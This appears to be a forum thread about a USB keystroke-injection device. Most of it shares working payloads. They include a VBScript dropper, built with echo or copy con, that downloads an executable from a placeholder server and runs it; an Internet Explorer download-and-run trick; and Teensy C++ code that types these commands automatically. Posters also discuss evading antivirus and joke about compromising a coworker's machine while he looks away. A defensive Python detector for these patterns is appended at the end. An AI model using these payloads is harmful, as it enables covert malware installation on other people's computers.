nox404 Posted April 20, 2010

Maybe something like this would work: have the duck load up cmd and type in...

```batch
echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
exit
```

This code will make a VB script that will execute and download a file from a web server. Then you run the file. There are a few Anti Virus that detect this as bad, but with some changes it will run good. I will be testing it here soon once my ducky gets here. Tell me what you guys think?
illwill Posted April 20, 2010

As far as I know that was blocked by Microsoft with a killbit entry in the registry years ago. You would have to delete this key first to make it work:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
nox404 (Author) Posted April 20, 2010

Tested it on Windows XP, Vista and Win7; all of it works.
Sebkinne Posted April 21, 2010

Works, but is recognized by most AVs as an exploit... But good work anyway.

Seb
nxt471 Posted April 21, 2010

Could not test it on a VM; AV blocked it as I saved it. I guess you could type it in manually; AVs are not looking for what you type, only the files.
Sebkinne Posted April 21, 2010

Actually, the AV will recognize it when the ducky just creates it like above in the Command Prompt. When you write the commands to the file dl.vbs with the > and >>, it writes to the file. Once the last part of the file is complete, the AV will call it, because it monitors files that are JUST being written to... So, a different method needs to be found...
nox404 (Author) Posted April 21, 2010

Yes, this is very true that AVs will find it. I was thinking of using Windows' built-in ftp, but the firewall by default blocks it. How about this, guys:

```
<start from cmd>
prompt>> "C:\Program Files\Internet Explorer\iexplore.exe" www.YOURSERVER.info/nox404/test.exe
alt-r
alt-r
prompt>> exit
```

I tested this with Internet Explorer 8. This will open Internet Explorer to a file. From there it will ask you to run, download, etc... You hit alt-r; this will run the .exe, and then again alt-r. At this point you will have executed the file. Then type exit and walk away. This happens very fast; the IE window does not stay open, it will close on its own. I tested this out with a small bot (10kb) and it worked great, almost instantaneous. What do you guys think?

PS. I will be getting my ducky today (at least that's what UPS says). Then I can start testing out real world applications.
nox404 (Author) Posted April 21, 2010 (edited)

```cpp
void setup() { } // no setup needed

void loop() {
  delay(10000);
  // Windows key
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  // Windows Key + R to open run
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // delay for computer
  delay(500);
  // send cmd into run
  Keyboard.print("cmd");
  // for the computer
  delay(50);
  // This hits the enter key
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // Testing Delay
  delay(500);
  // Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
  // Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // another delay :)
  delay(100);
  // Send exit to cmd.
  Keyboard.print("exit");
  // Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // this stops it from re-running for a bit
  delay(500000);
}
```

This is code that I have tested on 4 systems here: Win7 twice and Vista twice. This executes Explorer and downloads the file, running it in the process. Will change it up so that I can do it all from the run prompt. Tell me what you guys think.

Oh yeah, got the Ducky today; thing works like a charm.

Edited April 21, 2010 by nox404
Sebkinne Posted April 22, 2010

Looks good, I will try it out on a range of different machines. Good work!

Seb
AndrewFaulds Posted April 22, 2010 (edited)

Why the echo commands? copy con is more efficient ;) Just do:

```
copy con dl.vbs[RETURN]
Dim HTTPGET[RETURN]
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN]
HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN]
HTTPGET.Send[RETURN]
DataBin = HTTPGET.ResponseBody[RETURN]
Const adTypeBinary=1[RETURN]
Const adSaveCreateOverWrite=2[RETURN]
Dim test1[RETURN]
Set test1 = CreateObject("ADODB.Stream")[RETURN]
test1.Type = adTypeBinary[RETURN]
test1.Open[RETURN]
test1.Write DataBin[RETURN]
test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z]
file.exe[RETURN]
exit[RETURN]
```

Edited April 22, 2010 by AndrewFaulds
fjux Posted April 22, 2010 (edited)

Then what about this? When a VBS script is activated, the command prompt is immediately back. It doesn't wait for it to finish, so I think that the code from the first post won't work properly with bigger files. So why not let the VBS execute the file? It's only 3 lines.

```vbscript
Dim DataBin
Dim HTTPGET
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", "http://www.domain.com/file.exe", False
HTTPGET.Send
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim test1
Set test1 = CreateObject("ADODB.Stream")
test1.Type = adTypeBinary
test1.Open
test1.Write DataBin
test1.SaveToFile "file.exe", adSaveCreateOverWrite
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & "file.exe" & Chr(34), 1, false
```

And also you can put all the echos in 1 string, so the waiting time is less than having to wait till the prompt comes back up again. It will look something like this:

```batch
echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs
```

And then all that is left is to run it and exit CMD:

```
prompt> dl.vbs
prompt> exit
```

I think this is the lowest time possible being at the command prompt. Or someone needs to find a way to shrink the VB script even more! That would be awesome!

Since I didn't get selected for a dev kit I am thinking of buying my own Teensy. Though a question: I read that Darren is using the original one, but I checked the site and all of their stuff uses mini USB. Any good/simple way for a converter (buying or self-making is okay)? Cheers!

Edited April 22, 2010 by fjux
AndrewFaulds Posted April 22, 2010

Uh.... You can't have multiple echo commands in a line. And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con.
fjux Posted April 22, 2010

Yes, you can have multiple echos in one line. It is separated by && and cmd recognises it as a new command. I was thinking of this for at the run box: cmd.exe /c <command>, though the command was too long for the box. When I order my Ducky I will try both ways, to see which one is faster to execute.
AndrewFaulds Posted April 22, 2010

Still, copy con is more efficient.
nox404 (Author) Posted April 23, 2010

Change a line in the code. Now:

```cpp
  // Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
```

To:

```cpp
  // Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe && exit");
```

**Thanks to fjux for showing me that "&&" works in Windows to add another command. This will close CMD after launching Explorer. This code is tested and works better than before. With about 15 seconds, I can compromise a system. IT guy at work logs into my system, then somehow I make him look away, plug this bad boy in and bam! j/king, would never use this for "evil".

Requests: Can some of you guys that have one do some testing on the delay timers and see what you guys find is the best amount of time? All of the ones I have set up are there for testing, so they're a bit long.
fjux Posted April 23, 2010

I still like the VBS way of downloading more because of the less time it shows something on the screen. But if you want to do it that way, I recommend just doing it in the run box. Like:

```
"c:\\Program Files\\Internet Explorer\\iexplore.exe" www.YOURSERVER/nox404/THEFILE.exe
```

That does the same, without showing the cmd at all ;)
AndrewFaulds Posted April 23, 2010

Or, even better: Open the run box, type iexplore http://attacksite.com
nox404 (Author) Posted April 23, 2010

Sorry, do not get me wrong, I love the fact that you guys are actively talking and working on the VB script. I am just working on every way I can think of downloading a file using Ducky. To me Ducky is more of a crafted tool, less of a hacksaw "own everything". More of a "I got a target, so let me use VB script to download files if they do not have an AV that blocks it, or let me use the Explorer method." I'm hoping in the long run people will take the information in this thread and add it to the wiki as download methods (I will do it once the wiki is up and I find the time). Thank all of you for looking into these methods and helping me refine them!

** I tested out the VB script at work and it works flawlessly on our test system.
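The three tricks this thread walks through (building a script-host file with redirected echo commands, typing it in with copy con, and handing iexplore a URL that ends in an executable) all leave a recognisable trace in console input or command-line auditing. The following is an added defender-side example, not code from the thread or from any Hak5 project; the rule names, thresholds and sample console log are constructed for it.

```python
"""Flag console/command lines matching the cmd, VBScript and iexplore download-and-run
patterns discussed above. Rule names and thresholds are this example's own choices."""
import re

# COM objects the thread's VBScript uses to fetch a binary, save it and launch it.
SCRIPT_DOWNLOAD_OBJECTS = ("microsoft.xmlhttp", "msxml2.xmlhttp", "adodb.stream", "wscript.shell")
SCRIPT_EXT = r"\.(?:vbs|vbe|js|jse|wsf|hta)\b"
EXEC_EXT = r"\.(?:exe|scr|com|bat|cmd|msi)\b"

# "echo <text> >dl.vbs" or ">>dl.vbs": a script-host file assembled one line at a time.
ECHO_TO_SCRIPT = re.compile(r"\becho\b[^>]*>{1,2}\s*\S*" + SCRIPT_EXT, re.I)
# "copy con dl.vbs": the script typed straight into a file and closed with Ctrl+Z.
COPY_CON_SCRIPT = re.compile(r"\bcopy\s+con\s+\S*" + SCRIPT_EXT, re.I)
# iexplore[.exe] given a URL whose last path element is an executable.
IE_WITH_EXE_URL = re.compile(r"\biexplore(?:\.exe)?\"?\s+(?:https?://)?\S*" + EXEC_EXT, re.I)


def scan_command_line(cmdline):
    """Return the rule names a single line trips; an empty list means nothing matched."""
    hits = []
    lowered = cmdline.lower()
    if ECHO_TO_SCRIPT.search(cmdline):
        hits.append("echo-redirect-to-script")
    if COPY_CON_SCRIPT.search(cmdline):
        hits.append("copy-con-to-script")
    if any(obj in lowered for obj in SCRIPT_DOWNLOAD_OBJECTS):
        hits.append("script-download-object")
    if IE_WITH_EXE_URL.search(cmdline):
        hits.append("iexplore-launched-with-exe-url")
    # Several echoes chained with && on one line: the "type it all at once" variant.
    if cmdline.count("&&") >= 3 and lowered.count("echo ") >= 4:
        hits.append("echo-chain")
    return hits


def scan_log(lines):
    """Map 1-based line numbers to the rules they trip, skipping clean lines."""
    findings = {}
    for number, line in enumerate(lines, 1):
        hits = scan_command_line(line)
        if hits:
            findings[number] = hits
    return findings


# Constructed console input, not real telemetry; the host is a reserved .invalid name.
SAMPLE_CONSOLE_LOG = [
    "dir",
    "echo Dim DataBin >dl.vbs",
    'echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs',
    "copy con dl.vbs",
    'Set test1 = CreateObject("ADODB.Stream")',
    '"C:\\Program Files\\Internet Explorer\\iexplore.exe" www.example.invalid/files/test.exe && exit',
    "ping 127.0.0.1",
    "echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && "
    'echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Send>>dl.vbs',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_CONSOLE_LOG).items():
        print(f"line {number}: {', '.join(hits)}")
```

The copy con variant only exposes the "copy con dl.vbs" line itself, since the script body goes to the file rather than the command interpreter, which is why the object-name rule is evaluated on every line and not only on echo lines.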